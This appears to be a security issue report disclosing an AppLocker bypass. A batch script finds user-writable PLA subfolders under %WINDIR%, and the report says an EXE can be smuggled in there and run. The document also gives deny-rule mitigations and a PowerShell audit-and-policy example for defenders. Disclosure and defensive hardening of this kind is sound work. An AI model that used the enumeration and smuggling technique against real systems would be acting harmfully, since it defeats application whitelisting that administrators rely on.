Description
Using a basic script I wrote to discover directories writable by a basic user, I was able to enumerate a directory that was not mentioned in the UltimateAppLockerByPassList (https://github.com/api0cradle/UltimateAppLockerByPassList).
Here is my script:

```bat
@echo off
setlocal enabledelayedexpansion
rem Start the walk at the Windows directory
set "root_path=%windir%"
rem Recurse over every subdirectory (/d = directories only, /r = recursive)
for /d /r "%root_path%" %%F in (*) do (
    set "folder=%%F"
    rem Try to create a test file; all output/errors go to nul
    >nul 2>&1 (echo. > "%%F\test_write.txt") && (
        rem Creation succeeded, so the folder is writable; report and clean up
        echo %%F - Writable
        del "%%F\test_write.txt"
    )
)
endlocal
```
It output 3 subfolders that are writable and bypass the default execution rules:

```
%WINDIR%\PLA\reports*
%WINDIR%\PLA\rules*
%WINDIR%\PLA\Templates*
```
You can smuggle an EXE in there and launch it regularly.
How to Prevent:

Create 6 AppLocker rules to block the following so it covers ADS:

```
%WINDIR%\PLA\reports*
%WINDIR%\PLA\rules*
%WINDIR%\PLA\Templates*
%WINDIR%\PLA\reports:*
%WINDIR%\PLA\rules:*
%WINDIR%\PLA\Templates:*
```
Date of Discovery: 2/17/25
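The following PowerShell is an added example for defenders, not code from the issue author or the UltimateAppLockerByPassList project. It first audits the three PLA subfolders named above for write rights granted to broad local groups, then builds an AppLocker policy fragment containing Deny path rules for the six paths listed under "How to Prevent" (folder and ADS variants, exactly as written in the issue) and optionally merges it into the local policy. Rule names, GUIDs, the `Everyone` SID (`S-1-1-0`), the set of rule collections, the `$Apply` switch and the `NotConfigured` enforcement mode (intended to leave the existing enforcement setting of each collection alone) are choices made here, not taken from the issue; run it elevated and review the generated XML before applying.

```powershell
# Added example (not part of the issue). Assumes an elevated session and the
# local AppLocker policy (Set-AppLockerPolicy without -Ldap). Dry run by default.
$Apply = $false

# --- 1. Audit: which of the PLA subfolders grant write rights to broad groups?
$folders = @("$env:WINDIR\PLA\Reports", "$env:WINDIR\PLA\Rules", "$env:WINDIR\PLA\Templates")

# Identities that a standard interactive user is a member of (assumed list).
$broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow planting a file: WriteData/CreateFiles (2), AppendData/CreateDirectories (4),
# plus the composite Write right. Compared on the enum's raw integer value.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
             [int][System.Security.AccessControl.FileSystemRights]::CreateDirectories -bor
             [int][System.Security.AccessControl.FileSystemRights]::Write

function Get-BroadWriteAccess {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path
    # Return only Allow ACEs for a broad group that include some write right.
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($broadGroups -contains $_.IdentityReference.Value) -and
        (($_.FileSystemRights.value__ -band $writeMask) -ne 0)
    }
}

foreach ($f in $folders) {
    $hits = @(Get-BroadWriteAccess -Path $f)
    if ($hits.Count -gt 0) {
        Write-Warning "$f is writable by: $(($hits | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique) -join ', ')"
    } else {
        Write-Host "$f : no broad write access found"
    }
}

# --- 2. Mitigation: AppLocker Deny path rules for the six paths from the issue.
$denyPaths = @(
    '%WINDIR%\PLA\reports*',  '%WINDIR%\PLA\rules*',  '%WINDIR%\PLA\Templates*',
    '%WINDIR%\PLA\reports:*', '%WINDIR%\PLA\rules:*', '%WINDIR%\PLA\Templates:*'
)

function New-PlaDenyPolicyXml {
    param(
        [Parameter(Mandatory)][string[]]$Paths,
        # Collections chosen here; Dll rules only take effect if DLL enforcement is enabled.
        [string[]]$Collections = @('Exe', 'Dll', 'Script', 'Msi')
    )
    $sb = [System.Text.StringBuilder]::new()
    [void]$sb.AppendLine('<AppLockerPolicy Version="1">')
    foreach ($c in $Collections) {
        [void]$sb.AppendLine("  <RuleCollection Type=`"$c`" EnforcementMode=`"NotConfigured`">")
        foreach ($p in $Paths) {
            $id   = [guid]::NewGuid()                                   # fresh rule id
            $name = [System.Security.SecurityElement]::Escape("Deny $c - $p")
            $esc  = [System.Security.SecurityElement]::Escape($p)
            [void]$sb.AppendLine("    <FilePathRule Id=`"$id`" Name=`"$name`" Description=`"User-writable PLA folder`" UserOrGroupSid=`"S-1-1-0`" Action=`"Deny`">")
            [void]$sb.AppendLine("      <Conditions><FilePathCondition Path=`"$esc`" /></Conditions>")
            [void]$sb.AppendLine('    </FilePathRule>')
        }
        [void]$sb.AppendLine('  </RuleCollection>')
    }
    [void]$sb.AppendLine('</AppLockerPolicy>')
    return $sb.ToString()
}

$xmlPath = Join-Path $env:TEMP 'pla-deny-rules.xml'
New-PlaDenyPolicyXml -Paths $denyPaths | Set-Content -LiteralPath $xmlPath -Encoding UTF8
Write-Host "Policy fragment written to $xmlPath (review it before applying)"

if ($Apply) {
    # -Merge adds these rules to the existing local policy instead of replacing it.
    Set-AppLockerPolicy -XmlPolicy $xmlPath -Merge
    # Confirm the Deny rules landed in the effective policy.
    (Get-AppLockerPolicy -Effective -Xml) -split "`n" | Select-String 'PLA'
}
```

Set `$Apply = $true` only after reading the generated XML. Deny rules win over Allow rules in AppLocker, so these block execution from the PLA folders even though the default "Allow everything under %WINDIR%" rule still applies; a staging step with the collection in audit mode and a check of the AppLocker event log (Microsoft-Windows-AppLocker/EXE and DLL) shows whether anything legitimate runs from those paths before enforcement is turned on.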